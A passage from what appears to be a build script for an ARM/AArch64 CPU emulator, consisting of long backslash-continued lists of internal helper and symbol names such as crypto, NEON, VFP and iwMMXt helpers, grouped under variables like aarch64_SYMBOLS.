helper_crypto_sha1su1 \ helper_crypto_sha256h \ helper_crypto_sha256h2 \ helper_crypto_sha256su0 \ helper_crypto_sha256su1 \ helper_crypto_sha512h \ helper_crypto_sha512h2 \ helper_crypto_sha512su0 \ helper_crypto_sha512su1 \ helper_crypto_sm3partw1 \ helper_crypto_sm3partw2 \ helper_crypto_sm3tt \ helper_crypto_sm4e \ helper_crypto_sm4ekey \ helper_check_breakpoints \ arm_debug_check_watchpoint \ arm_debug_excp_handler \ arm_adjust_watchpoint_address \ read_raw_cp_reg \ pmu_init \ pmu_op_start \ pmu_op_finish \ pmu_pre_el_change \ pmu_post_el_change \ arm_pmu_timer_cb \ arm_gt_ptimer_cb \ arm_gt_vtimer_cb \ arm_gt_htimer_cb \ arm_gt_stimer_cb \ arm_gt_hvtimer_cb \ arm_hcr_el2_eff \ sve_exception_el \ sve_zcr_len_for_el \ hw_watchpoint_update \ hw_watchpoint_update_all \ hw_breakpoint_update \ hw_breakpoint_update_all \ register_cp_regs_for_features \ define_one_arm_cp_reg_with_opaque \ define_arm_cp_regs_with_opaque \ modify_arm_cp_regs \ get_arm_cp_reginfo \ arm_cp_write_ignore \ arm_cp_read_zero \ arm_cp_reset_ignore \ cpsr_read \ cpsr_write \ helper_sxtb16 \ helper_uxtb16 \ helper_sdiv \ helper_udiv \ helper_rbit \ arm_phys_excp_target_el \ aarch64_sync_32_to_64 \ aarch64_sync_64_to_32 \ arm_cpu_do_interrupt \ arm_sctlr \ arm_s1_regime_using_lpae_format \ aa64_va_parameters \ v8m_security_lookup \ pmsav8_mpu_lookup \ get_phys_addr \ arm_cpu_get_phys_page_attrs_debug \ helper_qadd16 \ helper_qadd8 \ helper_qsub16 \ helper_qsub8 \ helper_qsubaddx \ helper_qaddsubx \ helper_uqadd16 \ helper_uqadd8 \ helper_uqsub16 \ helper_uqsub8 \ helper_uqsubaddx \ helper_uqaddsubx \ helper_sadd16 \ helper_sadd8 \ helper_ssub16 \ helper_ssub8 \ helper_ssubaddx \ helper_saddsubx \ helper_uadd16 \ helper_uadd8 \ helper_usub16 \ helper_usub8 \ helper_usubaddx \ helper_uaddsubx \ helper_shadd16 \ helper_shadd8 \ helper_shsub16 \ helper_shsub8 \ helper_shsubaddx \ helper_shaddsubx \ helper_uhadd16 \ helper_uhadd8 \ helper_uhsub16 \ helper_uhsub8 \ helper_uhsubaddx \ helper_uhaddsubx \ helper_usad8 \ helper_sel_flags \ helper_crc32 \ helper_crc32c \ fp_exception_el \ arm_mmu_idx_to_el \ arm_mmu_idx_el \ arm_mmu_idx \ arm_stage1_mmu_idx \ arm_rebuild_hflags \ helper_rebuild_hflags_m32_newel \ helper_rebuild_hflags_m32 \ helper_rebuild_hflags_a32_newel \ helper_rebuild_hflags_a32 \ helper_rebuild_hflags_a64 \ cpu_get_tb_cpu_state \ helper_iwmmxt_maddsq \ helper_iwmmxt_madduq \ helper_iwmmxt_sadb \ helper_iwmmxt_sadw \ helper_iwmmxt_mulslw \ helper_iwmmxt_mulshw \ helper_iwmmxt_mululw \ helper_iwmmxt_muluhw \ helper_iwmmxt_macsw \ helper_iwmmxt_macuw \ helper_iwmmxt_unpacklb \ helper_iwmmxt_unpacklw \ helper_iwmmxt_unpackll \ helper_iwmmxt_unpacklub \ helper_iwmmxt_unpackluw \ helper_iwmmxt_unpacklul \ helper_iwmmxt_unpacklsb \ helper_iwmmxt_unpacklsw \ helper_iwmmxt_unpacklsl \ helper_iwmmxt_unpackhb \ helper_iwmmxt_unpackhw \ helper_iwmmxt_unpackhl \ helper_iwmmxt_unpackhub \ helper_iwmmxt_unpackhuw \ helper_iwmmxt_unpackhul \ helper_iwmmxt_unpackhsb \ helper_iwmmxt_unpackhsw \ helper_iwmmxt_unpackhsl \ helper_iwmmxt_cmpeqb \ helper_iwmmxt_cmpeqw \ helper_iwmmxt_cmpeql \ helper_iwmmxt_cmpgtsb \ helper_iwmmxt_cmpgtsw \ helper_iwmmxt_cmpgtsl \ helper_iwmmxt_cmpgtub \ helper_iwmmxt_cmpgtuw \ helper_iwmmxt_cmpgtul \ helper_iwmmxt_minsb \ helper_iwmmxt_minsw \ helper_iwmmxt_minsl \ helper_iwmmxt_minub \ helper_iwmmxt_minuw \ helper_iwmmxt_minul \ helper_iwmmxt_maxsb \ helper_iwmmxt_maxsw \ helper_iwmmxt_maxsl \ helper_iwmmxt_maxub \ helper_iwmmxt_maxuw \ helper_iwmmxt_maxul \ helper_iwmmxt_subnb \ helper_iwmmxt_subnw \ helper_iwmmxt_subnl \ helper_iwmmxt_addnb \ helper_iwmmxt_addnw \ helper_iwmmxt_addnl \ helper_iwmmxt_subub \ helper_iwmmxt_subuw \ helper_iwmmxt_subul \ helper_iwmmxt_addub \ helper_iwmmxt_adduw \ helper_iwmmxt_addul \ helper_iwmmxt_subsb \ helper_iwmmxt_subsw \ helper_iwmmxt_subsl \ helper_iwmmxt_addsb \ helper_iwmmxt_addsw \ helper_iwmmxt_addsl \ helper_iwmmxt_avgb0 \ helper_iwmmxt_avgb1 \ helper_iwmmxt_avgw0 \ helper_iwmmxt_avgw1 \ helper_iwmmxt_align \ helper_iwmmxt_insr \ helper_iwmmxt_setpsr_nz \ helper_iwmmxt_bcstb \ helper_iwmmxt_bcstw \ helper_iwmmxt_bcstl \ helper_iwmmxt_addcb \ helper_iwmmxt_addcw \ helper_iwmmxt_addcl \ helper_iwmmxt_msbb \ helper_iwmmxt_msbw \ helper_iwmmxt_msbl \ helper_iwmmxt_srlw \ helper_iwmmxt_srll \ helper_iwmmxt_srlq \ helper_iwmmxt_sllw \ helper_iwmmxt_slll \ helper_iwmmxt_sllq \ helper_iwmmxt_sraw \ helper_iwmmxt_sral \ helper_iwmmxt_sraq \ helper_iwmmxt_rorw \ helper_iwmmxt_rorl \ helper_iwmmxt_rorq \ helper_iwmmxt_shufh \ helper_iwmmxt_packuw \ helper_iwmmxt_packul \ helper_iwmmxt_packuq \ helper_iwmmxt_packsw \ helper_iwmmxt_packsl \ helper_iwmmxt_packsq \ helper_iwmmxt_muladdsl \ helper_iwmmxt_muladdsw \ helper_iwmmxt_muladdswl \ armv7m_nvic_set_pending \ helper_v7m_preserve_fp_state \ write_v7m_exception \ helper_v7m_bxns \ helper_v7m_blxns \ armv7m_nvic_neg_prio_requested \ helper_v7m_vlstm \ helper_v7m_vlldm \ arm_v7m_cpu_do_interrupt \ helper_v7m_mrs \ helper_v7m_msr \ helper_v7m_tt \ arm_v7m_mmu_idx_all \ arm_v7m_mmu_idx_for_secstate_and_priv \ arm_v7m_mmu_idx_for_secstate \ helper_neon_qadd_u8 \ helper_neon_qadd_u16 \ helper_neon_qadd_u32 \ helper_neon_qadd_u64 \ helper_neon_qadd_s8 \ helper_neon_qadd_s16 \ helper_neon_qadd_s32 \ helper_neon_qadd_s64 \ helper_neon_uqadd_s8 \ helper_neon_uqadd_s16 \ helper_neon_uqadd_s32 \ helper_neon_uqadd_s64 \ helper_neon_sqadd_u8 \ helper_neon_sqadd_u16 \ helper_neon_sqadd_u32 \ helper_neon_sqadd_u64 \ helper_neon_qsub_u8 \ helper_neon_qsub_u16 \ helper_neon_qsub_u32 \ helper_neon_qsub_u64 \ helper_neon_qsub_s8 \ helper_neon_qsub_s16 \ helper_neon_qsub_s32 \ helper_neon_qsub_s64 \ helper_neon_hadd_s8 \ helper_neon_hadd_u8 \ helper_neon_hadd_s16 \ helper_neon_hadd_u16 \ helper_neon_hadd_s32 \ helper_neon_hadd_u32 \ helper_neon_rhadd_s8 \ helper_neon_rhadd_u8 \ helper_neon_rhadd_s16 \ helper_neon_rhadd_u16 \ helper_neon_rhadd_s32 \ helper_neon_rhadd_u32 \ helper_neon_hsub_s8 \ helper_neon_hsub_u8 \ helper_neon_hsub_s16 \ helper_neon_hsub_u16 \ helper_neon_hsub_s32 \ helper_neon_hsub_u32 \ helper_neon_cgt_s8 \ helper_neon_cgt_u8 \ helper_neon_cgt_s16 \ helper_neon_cgt_u16 \ helper_neon_cgt_s32 \ helper_neon_cgt_u32 \ helper_neon_cge_s8 \ helper_neon_cge_u8 \ helper_neon_cge_s16 \ helper_neon_cge_u16 \ helper_neon_cge_s32 \ helper_neon_cge_u32 \ helper_neon_pmin_s8 \ helper_neon_pmin_u8 \ helper_neon_pmin_s16 \ helper_neon_pmin_u16 \ helper_neon_pmax_s8 \ helper_neon_pmax_u8 \ helper_neon_pmax_s16 \ helper_neon_pmax_u16 \ helper_neon_abd_s8 \ helper_neon_abd_u8 \ helper_neon_abd_s16 \ helper_neon_abd_u16 \ helper_neon_abd_s32 \ helper_neon_abd_u32 \ helper_neon_shl_u16 \ helper_neon_shl_s16 \ helper_neon_rshl_s8 \ helper_neon_rshl_s16 \ helper_neon_rshl_s32 \ helper_neon_rshl_s64 \ helper_neon_rshl_u8 \ helper_neon_rshl_u16 \ helper_neon_rshl_u32 \ helper_neon_rshl_u64 \ helper_neon_qshl_u8 \ helper_neon_qshl_u16 \ helper_neon_qshl_u32 \ helper_neon_qshl_u64 \ helper_neon_qshl_s8 \ helper_neon_qshl_s16 \ helper_neon_qshl_s32 \ helper_neon_qshl_s64 \ helper_neon_qshlu_s8 \ helper_neon_qshlu_s16 \ helper_neon_qshlu_s32 \ helper_neon_qshlu_s64 \ helper_neon_qrshl_u8 \ helper_neon_qrshl_u16 \ helper_neon_qrshl_u32 \ helper_neon_qrshl_u64 \ helper_neon_qrshl_s8 \ helper_neon_qrshl_s16 \ helper_neon_qrshl_s32 \ helper_neon_qrshl_s64 \ helper_neon_add_u8 \ helper_neon_add_u16 \ helper_neon_padd_u8 \ helper_neon_padd_u16 \ helper_neon_sub_u8 \ helper_neon_sub_u16 \ helper_neon_mul_u8 \ helper_neon_mul_u16 \ helper_neon_tst_u8 \ helper_neon_tst_u16 \ helper_neon_tst_u32 \ helper_neon_ceq_u8 \ helper_neon_ceq_u16 \ helper_neon_ceq_u32 \ helper_neon_clz_u8 \ helper_neon_clz_u16 \ helper_neon_cls_s8 \ helper_neon_cls_s16 \ helper_neon_cls_s32 \ helper_neon_cnt_u8 \ helper_neon_rbit_u8 \ helper_neon_qdmulh_s16 \ helper_neon_qrdmulh_s16 \ helper_neon_qdmulh_s32 \ helper_neon_qrdmulh_s32 \ helper_neon_narrow_u8 \ helper_neon_narrow_u16 \ helper_neon_narrow_high_u8 \ helper_neon_narrow_high_u16 \ helper_neon_narrow_round_high_u8 \ helper_neon_narrow_round_high_u16 \ helper_neon_unarrow_sat8 \ helper_neon_narrow_sat_u8 \ helper_neon_narrow_sat_s8 \ helper_neon_unarrow_sat16 \ helper_neon_narrow_sat_u16 \ helper_neon_narrow_sat_s16 \ helper_neon_unarrow_sat32 \ helper_neon_narrow_sat_u32 \ helper_neon_narrow_sat_s32 \ helper_neon_widen_u8 \ helper_neon_widen_s8 \ helper_neon_widen_u16 \ helper_neon_widen_s16 \ helper_neon_addl_u16 \ helper_neon_addl_u32 \ helper_neon_paddl_u16 \ helper_neon_paddl_u32 \ helper_neon_subl_u16 \ helper_neon_subl_u32 \ helper_neon_addl_saturate_s32 \ helper_neon_addl_saturate_s64 \ helper_neon_abdl_u16 \ helper_neon_abdl_s16 \ helper_neon_abdl_u32 \ helper_neon_abdl_s32 \ helper_neon_abdl_u64 \ helper_neon_abdl_s64 \ helper_neon_mull_u8 \ helper_neon_mull_s8 \ helper_neon_mull_u16 \ helper_neon_mull_s16 \ helper_neon_negl_u16 \ helper_neon_negl_u32 \ helper_neon_qabs_s8 \ helper_neon_qneg_s8 \ helper_neon_qabs_s16 \ helper_neon_qneg_s16 \ helper_neon_qabs_s32 \ helper_neon_qneg_s32 \ helper_neon_qabs_s64 \ helper_neon_qneg_s64 \ helper_neon_abd_f32 \ helper_neon_ceq_f32 \ helper_neon_cge_f32 \ helper_neon_cgt_f32 \ helper_neon_acge_f32 \ helper_neon_acgt_f32 \ helper_neon_acge_f64 \ helper_neon_acgt_f64 \ helper_neon_qunzip8 \ helper_neon_qunzip16 \ helper_neon_qunzip32 \ helper_neon_unzip8 \ helper_neon_unzip16 \ helper_neon_qzip8 \ helper_neon_qzip16 \ helper_neon_qzip32 \ helper_neon_zip8 \ helper_neon_zip16 \ raise_exception \ raise_exception_ra \ helper_neon_tbl \ helper_v8m_stackcheck \ helper_add_setq \ helper_add_saturate \ helper_sub_saturate \ helper_add_usaturate \ helper_sub_usaturate \ helper_ssat \ helper_ssat16 \ helper_usat \ helper_usat16 \ helper_setend \ helper_wfi \ helper_wfe \ helper_yield \ helper_exception_internal \ helper_exception_with_syndrome \ helper_exception_bkpt_insn \ helper_cpsr_read \ helper_cpsr_write \ helper_cpsr_write_eret \ helper_get_user_reg \ helper_set_user_reg \ helper_set_r13_banked \ helper_get_r13_banked \ helper_msr_banked \ helper_mrs_banked \ helper_access_check_cp_reg \ helper_set_cp_reg \ helper_get_cp_reg \ helper_set_cp_reg64 \ helper_get_cp_reg64 \ helper_pre_hvc \ helper_pre_smc \ helper_shl_cc \ helper_shr_cc \ helper_sar_cc \ helper_ror_cc \ arm_is_psci_call \ arm_handle_psci_call \ arm_cpu_do_unaligned_access \ arm_cpu_do_transaction_failed \ arm_cpu_tlb_fill \ arm_translate_init \ arm_test_cc \ arm_free_cc \ arm_jump_cc \ arm_gen_test_cc \ vfp_expand_imm \ gen_cmtst_i64 \ gen_ushl_i32 \ gen_ushl_i64 \ gen_sshl_i32 \ gen_sshl_i64 \ gen_intermediate_code \ restore_state_to_opc \ helper_neon_qrdmlah_s16 \ helper_gvec_qrdmlah_s16 \ helper_neon_qrdmlsh_s16 \ helper_gvec_qrdmlsh_s16 \ helper_neon_qrdmlah_s32 \ helper_gvec_qrdmlah_s32 \ helper_neon_qrdmlsh_s32 \ helper_gvec_qrdmlsh_s32 \ helper_gvec_sdot_b \ helper_gvec_udot_b \ helper_gvec_sdot_h \ helper_gvec_udot_h \ helper_gvec_sdot_idx_b \ helper_gvec_udot_idx_b \ helper_gvec_sdot_idx_h \ helper_gvec_udot_idx_h \ helper_gvec_fcaddh \ helper_gvec_fcadds \ helper_gvec_fcaddd \ helper_gvec_fcmlah \ helper_gvec_fcmlah_idx \ helper_gvec_fcmlas \ helper_gvec_fcmlas_idx \ helper_gvec_fcmlad \ helper_gvec_frecpe_h \ helper_gvec_frecpe_s \ helper_gvec_frecpe_d \ helper_gvec_frsqrte_h \ helper_gvec_frsqrte_s \ helper_gvec_frsqrte_d \ helper_gvec_fadd_h \ helper_gvec_fadd_s \ helper_gvec_fadd_d \ helper_gvec_fsub_h \ helper_gvec_fsub_s \ helper_gvec_fsub_d \ helper_gvec_fmul_h \ helper_gvec_fmul_s \ helper_gvec_fmul_d \ helper_gvec_ftsmul_h \ helper_gvec_ftsmul_s \ helper_gvec_ftsmul_d \ helper_gvec_fmul_idx_h \ helper_gvec_fmul_idx_s \ helper_gvec_fmul_idx_d \ helper_gvec_fmla_idx_h \ helper_gvec_fmla_idx_s \ helper_gvec_fmla_idx_d \ helper_gvec_uqadd_b \ helper_gvec_uqadd_h \ helper_gvec_uqadd_s \ helper_gvec_sqadd_b \ helper_gvec_sqadd_h \ helper_gvec_sqadd_s \ helper_gvec_uqsub_b \ helper_gvec_uqsub_h \ helper_gvec_uqsub_s \ helper_gvec_sqsub_b \ helper_gvec_sqsub_h \ helper_gvec_sqsub_s \ helper_gvec_uqadd_d \ helper_gvec_uqsub_d \ helper_gvec_sqadd_d \ helper_gvec_sqsub_d \ helper_gvec_fmlal_a32 \ helper_gvec_fmlal_a64 \ helper_gvec_fmlal_idx_a32 \ helper_gvec_fmlal_idx_a64 \ helper_gvec_sshl_b \ helper_gvec_sshl_h \ helper_gvec_ushl_b \ helper_gvec_ushl_h \ helper_gvec_pmul_b \ helper_gvec_pmull_q \ helper_neon_pmull_h \ helper_vfp_get_fpscr \ vfp_get_fpscr \ helper_vfp_set_fpscr \ vfp_set_fpscr \ helper_vfp_adds \ helper_vfp_addd \ helper_vfp_subs \ helper_vfp_subd \ helper_vfp_muls \ helper_vfp_muld \ helper_vfp_divs \ helper_vfp_divd \ helper_vfp_mins \ helper_vfp_mind \ helper_vfp_maxs \ helper_vfp_maxd \ helper_vfp_minnums \ helper_vfp_minnumd \ helper_vfp_maxnums \ helper_vfp_maxnumd \ helper_vfp_negs \ helper_vfp_negd \ helper_vfp_abss \ helper_vfp_absd \ helper_vfp_sqrts \ helper_vfp_sqrtd \ helper_vfp_cmps \ helper_vfp_cmpes \ helper_vfp_cmpd \ helper_vfp_cmped \ helper_vfp_sitoh \ helper_vfp_tosih \ helper_vfp_tosizh \ helper_vfp_sitos \ helper_vfp_tosis \ helper_vfp_tosizs \ helper_vfp_sitod \ helper_vfp_tosid \ helper_vfp_tosizd \ helper_vfp_uitoh \ helper_vfp_touih \ helper_vfp_touizh \ helper_vfp_uitos \ helper_vfp_touis \ helper_vfp_touizs \ helper_vfp_uitod \ helper_vfp_touid \ helper_vfp_touizd \ helper_vfp_fcvtds \ helper_vfp_fcvtsd \ helper_vfp_shtod \ helper_vfp_toshd_round_to_zero \ helper_vfp_toshd \ helper_vfp_sltod \ helper_vfp_tosld_round_to_zero \ helper_vfp_tosld \ helper_vfp_sqtod \ helper_vfp_tosqd \ helper_vfp_uhtod \ helper_vfp_touhd_round_to_zero \ helper_vfp_touhd \ helper_vfp_ultod \ helper_vfp_tould_round_to_zero \ helper_vfp_tould \ helper_vfp_uqtod \ helper_vfp_touqd \ helper_vfp_shtos \ helper_vfp_toshs_round_to_zero \ helper_vfp_toshs \ helper_vfp_sltos \ helper_vfp_tosls_round_to_zero \ helper_vfp_tosls \ helper_vfp_sqtos \ helper_vfp_tosqs \ helper_vfp_uhtos \ helper_vfp_touhs_round_to_zero \ helper_vfp_touhs \ helper_vfp_ultos \ helper_vfp_touls_round_to_zero \ helper_vfp_touls \ helper_vfp_uqtos \ helper_vfp_touqs \ helper_vfp_sltoh \ helper_vfp_ultoh \ helper_vfp_sqtoh \ helper_vfp_uqtoh \ helper_vfp_toshh \ helper_vfp_touhh \ helper_vfp_toslh \ helper_vfp_toulh \ helper_vfp_tosqh \ helper_vfp_touqh \ helper_set_rmode \ helper_set_neon_rmode \ helper_vfp_fcvt_f16_to_f32 \ helper_vfp_fcvt_f32_to_f16 \ helper_vfp_fcvt_f16_to_f64 \ helper_vfp_fcvt_f64_to_f16 \ helper_recps_f32 \ helper_rsqrts_f32 \ helper_recpe_f16 \ helper_recpe_f32 \ helper_recpe_f64 \ helper_rsqrte_f16 \ helper_rsqrte_f32 \ helper_rsqrte_f64 \ helper_recpe_u32 \ helper_rsqrte_u32 \ helper_vfp_muladds \ helper_vfp_muladdd \ helper_rints_exact \ helper_rintd_exact \ helper_rints \ helper_rintd \ arm_rmode_to_sf \ helper_fjcvtzs \ helper_vjcvt \ helper_frint32_s \ helper_frint64_s \ helper_frint32_d \ helper_frint64_d \ helper_check_hcr_el2_trap \ mla_op \ mls_op \ sshl_op \ ushl_op \ uqsub_op \ sqsub_op \ uqadd_op \ sqadd_op \ sli_op \ cmtst_op \ sri_op \ usra_op \ ssra_op \ " aarch64_SYMBOLS=" cpu_aarch64_init \ arm_cpu_exec_interrupt \ arm_cpu_update_virq \ arm_cpu_update_vfiq \ arm_cpu_initfn \ gt_cntfrq_period_ns \ arm_cpu_post_init \ arm_cpu_realizefn \ arm_cpu_class_init \ cpu_arm_init \ helper_crypto_aese \ helper_crypto_aesmc \ helper_crypto_sha1_3reg \ helper_crypto_sha1h \ helper_crypto_sha1su1 \ helper_crypto_sha256h \ helper_crypto_sha256h2 \ helper_crypto_sha256su0 \ helper_crypto_sha256su1 \ helper_crypto_sha512h \ helper_crypto_sha512h2 \ helper_crypto_sha512su0 \ helper_crypto_sha512su1 \ helper_crypto_sm3partw1 \ helper_crypto_sm3partw2 \ helper_crypto_sm3tt \ helper_crypto_sm4e \ helper_crypto_sm4ekey \ helper_check_breakpoints \ arm_debug_check_watchpoint \ arm_debug_excp_handler \ arm_adjust_watchpoint_address \ helper_udiv64 \ helper_sdiv64 \ helper_rbit64 \ helper_msr_i_spsel \ helper_msr_i_daifset \ helper_msr_i_daifclear \ helper_vfp_cmph_a64 \ helper_vfp_cmpeh_a64 \ helper_vfp_cmps_a64 \ helper_vfp_cmpes_a64 \ helper_vfp_cmpd_a64 \ helper_vfp_cmped_a64 \ helper_vfp_mulxs \ helper_vfp_mulxd \ helper_simd_tbl \ helper_neon_ceq_f64 \ helper_neon_cge_f64 \ helper_neon_cgt_f64 \ helper_recpsf_f16 \ helper_recpsf_f32 \ helper_recpsf_f64 \ helper_rsqrtsf_f16 \ helper_rsqrtsf_f32 \ helper_rsqrtsf_f64 \ helper_neon_addlp_s8 \ helper_neon_addlp_u8 \ helper_neon_addlp_s16 \ helper_neon_addlp_u16 \ helper_frecpx_f16 \ helper_frecpx_f32 \ helper_frecpx_f64 \ helper_fcvtx_f64_to_f32 \ helper_crc32_64 \ helper_crc32c_64 \ helper_paired_cmpxchg64_le \ helper_paired_cmpxchg64_le_parallel \ helper_paired_cmpxchg64_be \ helper_paired_cmpxchg64_be_parallel \ helper_casp_le_parallel \ helper_casp_be_parallel \ helper_advsimd_addh \ helper_advsimd_subh \ helper_advsimd_mulh \ helper_advsimd_divh \ helper_advsimd_minh \ helper_advsimd_maxh \ helper_advsimd_minnumh \ helper_advsimd_maxnumh \ helper_advsimd_add2h \ helper_advsimd_sub2h \ helper_advsimd_mul2h \ helper_advsimd_div2h \ helper_advsimd_min2h \ helper_advsimd_max2h \ helper_advsimd_minnum2h \ helper_advsimd_maxnum2h \ helper_advsimd_mulxh \ helper_advsimd_mulx2h \ helper_advsimd_muladdh \ helper_advsimd_muladd2h \ helper_advsimd_ceq_f16 \ helper_advsimd_cge_f16 \ helper_advsimd_cgt_f16 \ helper_advsimd_acge_f16 \ helper_advsimd_acgt_f16 \ helper_advsimd_rinth_exact \ helper_advsimd_rinth \ helper_advsimd_f16tosinth \ helper_advsimd_f16touinth \ helper_exception_return \ helper_sqrt_f16 \ helper_dc_zva \ read_raw_cp_reg \ pmu_init \ pmu_op_start \ pmu_op_finish \ pmu_pre_el_change \ pmu_post_el_change \ arm_pmu_timer_cb \ arm_gt_ptimer_cb \ arm_gt_vtimer_cb \ arm_gt_htimer_cb \ arm_gt_stimer_cb \ arm_gt_hvtimer_cb \ arm_hcr_el2_eff \ sve_exception_el \ sve_zcr_len_for_el \ hw_watchpoint_update \ hw_watchpoint_update_all \ hw_breakpoint_update \ hw_breakpoint_update_all \ register_cp_regs_for_features \ define_one_arm_cp_reg_with_opaque \ define_arm_cp_regs_with_opaque \ modify_arm_cp_regs \ get_arm_cp_reginfo \ arm_cp_write_ignore \ arm_cp_read_zero \ arm_cp_reset_ignore \ cpsr_read \ cpsr_write \ helper_sxtb16 \ helper_uxtb16 \ helper_sdiv \ helper_udiv \ helper_rbit \ arm_phys_excp_target_el \ aarch64_sync_32_to_64 \ aarch64_sync_64_to_32 \ arm_cpu_do_interrupt \ arm_sctlr \ arm_s1_regime_using_lpae_format \ aa64_va_parameters \ v8m_security_lookup \ pmsav8_mpu_lookup \ get_phys_addr \ arm_cpu_get_phys_page_attrs_debug \ helper_qadd16 \ helper_qadd8 \ helper_qsub16 \ helper_qsub8 \ helper_qsubaddx \ helper_qaddsubx \ helper_uqadd16 \ helper_uqadd8 \ helper_uqsub16 \ helper_uqsub8 \ helper_uqsubaddx \ helper_uqaddsubx \ helper_sadd16 \ helper_sadd8 \ helper_ssub16 \ helper_ssub8 \ helper_ssubaddx \ helper_saddsubx \ helper_uadd16 \ helper_uadd8 \ helper_usub16 \ helper_usub8 \ helper_usubaddx \ helper_uaddsubx \ helper_shadd16 \ helper_shadd8 \ helper_shsub16 \ helper_shsub8 \ helper_shsubaddx \ helper_shaddsubx \ helper_uhadd16 \ helper_uhadd8 \ helper_uhsub16 \ helper_uhsub8 \ helper_uhsubaddx \ helper_uhaddsubx \ helper_usad8 \ helper_sel_flags \ helper_crc32 \ helper_crc32c \ fp_exception_el \ arm_mmu_idx_to_el \ arm_mmu_idx_el \ arm_mmu_idx \ arm_stage1_mmu_idx \ arm_rebuild_hflags \ helper_rebuild_hflags_m32_newel \ helper_rebuild_hflags_m32 \ helper_rebuild_hflags_a32_newel \ helper_rebuild_hflags_a32 \ helper_rebuild_hflags_a64 \ cpu_get_tb_cpu_state \ aarch64_sve_narrow_vq \ aarch64_sve_change_el \ helper_iwmmxt_maddsq \ helper_iwmmxt_madduq \ helper_iwmmxt_sadb \ helper_iwmmxt_sadw \ helper_iwmmxt_mulslw \ helper_iwmmxt_mulshw \ helper_iwmmxt_mululw \ helper_iwmmxt_muluhw \ helper_iwmmxt_macsw \ helper_iwmmxt_macuw \ helper_iwmmxt_unpacklb \ helper_iwmmxt_unpacklw \ helper_iwmmxt_unpackll \ helper_iwmmxt_unpacklub \ helper_iwmmxt_unpackluw \ helper_iwmmxt_unpacklul \ helper_iwmmxt_unpacklsb \ helper_iwmmxt_unpacklsw \ helper_iwmmxt_unpacklsl \ helper_iwmmxt_unpackhb \ helper_iwmmxt_unpackhw \ helper_iwmmxt_unpackhl \ helper_iwmmxt_unpackhub \ helper_iwmmxt_unpackhuw \ helper_iwmmxt_unpackhul \ helper_iwmmxt_unpackhsb \ helper_iwmmxt_unpackhsw \ helper_iwmmxt_unpackhsl \ helper_iwmmxt_cmpeqb \ helper_iwmmxt_cmpeqw \ helper_iwmmxt_cmpeql \ helper_iwmmxt_cmpgtsb \ helper_iwmmxt_cmpgtsw \ helper_iwmmxt_cmpgtsl \ helper_iwmmxt_cmpgtub \ helper_iwmmxt_cmpgtuw \ helper_iwmmxt_cmpgtul \ helper_iwmmxt_minsb \ helper_iwmmxt_minsw \ helper_iwmmxt_minsl \ helper_iwmmxt_minub \ helper_iwmmxt_minuw \ helper_iwmmxt_minul \ helper_iwmmxt_maxsb \ helper_iwmmxt_maxsw \ helper_iwmmxt_maxsl \ helper_iwmmxt_maxub \ helper_iwmmxt_maxuw \ helper_iwmmxt_maxul \ helper_iwmmxt_subnb \ helper_iwmmxt_subnw \ helper_iwmmxt_subnl \ helper_iwmmxt_addnb \ helper_iwmmxt_addnw \ helper_iwmmxt_addnl \ helper_iwmmxt_subub \ helper_iwmmxt_subuw \ helper_iwmmxt_subul \ helper_iwmmxt_addub \ helper_iwmmxt_adduw \ helper_iwmmxt_addul \ helper_iwmmxt_subsb \ helper_iwmmxt_subsw \ helper_iwmmxt_subsl \ helper_iwmmxt_addsb \ helper_iwmmxt_addsw \ helper_iwmmxt_addsl \ helper_iwmmxt_avgb0 \ helper_iwmmxt_avgb1 \ helper_iwmmxt_avgw0 \ helper_iwmmxt_avgw1 \ helper_iwmmxt_align \ helper_iwmmxt_insr \ helper_iwmmxt_setpsr_nz \ helper_iwmmxt_bcstb \ helper_iwmmxt_bcstw \ helper_iwmmxt_bcstl \ helper_iwmmxt_addcb \ helper_iwmmxt_addcw \ helper_iwmmxt_addcl \ helper_iwmmxt_msbb \ helper_iwmmxt_msbw \ helper_iwmmxt_msbl \ helper_iwmmxt_srlw \ helper_iwmmxt_srll \ helper_iwmmxt_srlq \ helper_iwmmxt_sllw \ helper_iwmmxt_slll \ helper_iwmmxt_sllq \ helper_iwmmxt_sraw \ helper_iwmmxt_sral \ helper_iwmmxt_sraq \ helper_iwmmxt_rorw \ helper_iwmmxt_rorl \ helper_iwmmxt_rorq \ helper_iwmmxt_shufh \ helper_iwmmxt_packuw \ helper_iwmmxt_packul \ helper_iwmmxt_packuq \ helper_iwmmxt_packsw \ helper_iwmmxt_packsl \ helper_iwmmxt_packsq \ helper_iwmmxt_muladdsl \ helper_iwmmxt_muladdsw \ helper_iwmmxt_muladdswl \ armv7m_nvic_set_pending \ helper_v7m_preserve_fp_state \ write_v7m_exception \ helper_v7m_bxns \ helper_v7m_blxns \ armv7m_nvic_neg_prio_requested \ helper_v7m_vlstm \ helper_v7m_vlldm \ arm_v7m_cpu_do_interrupt \ helper_v7m_mrs \ helper_v7m_msr \ helper_v7m_tt \ arm_v7m_mmu_idx_all \ arm_v7m_mmu_idx_for_secstate_and_priv \ arm_v7m_mmu_idx_for_secstate \ helper_neon_qadd_u8 \ helper_neon_qadd_u16 \ helper_neon_qadd_u32 \ helper_neon_qadd_u64 \ helper_neon_qadd_s8 \ helper_neon_qadd_s16 \ helper_neon_qadd_s32 \ helper_neon_qadd_s64 \ helper_neon_uqadd_s8 \ helper_neon_uqadd_s16 \ helper_neon_uqadd_s32 \ helper_neon_uqadd_s64 \ helper_neon_sqadd_u8 \ helper_neon_sqadd_u16 \ helper_neon_sqadd_u32 \ helper_neon_sqadd_u64 \ helper_neon_qsub_u8 \ helper_neon_qsub_u16 \ helper_neon_qsub_u32 \ helper_neon_qsub_u64 \ helper_neon_qsub_s8 \ helper_neon_qsub_s16 \ helper_neon_qsub_s32 \ helper_neon_qsub_s64 \ helper_neon_hadd_s8 \ helper_neon_hadd_u8 \ helper_neon_hadd_s16 \ helper_neon_hadd_u16 \ helper_neon_hadd_s32 \ helper_neon_hadd_u32 \ helper_neon_rhadd_s8 \ helper_neon_rhadd_u8 \ helper_neon_rhadd_s16 \ helper_neon_rhadd_u16 \ helper_neon_rhadd_s32 \ helper_neon_rhadd_u32 \ helper_neon_hsub_s8 \ helper_neon_hsub_u8 \ helper_neon_hsub_s16 \ helper_neon_hsub_u16 \ helper_neon_hsub_s32 \ helper_neon_hsub_u32 \ helper_neon_cgt_s8 \ helper_neon_cgt_u8 \ helper_neon_cgt_s16 \ helper_neon_cgt_u16 \ helper_neon_cgt_s32 \ helper_neon_cgt_u32 \ helper_neon_cge_s8 \ helper_neon_cge_u8 \ helper_neon_cge_s16 \ helper_neon_cge_u16 \ 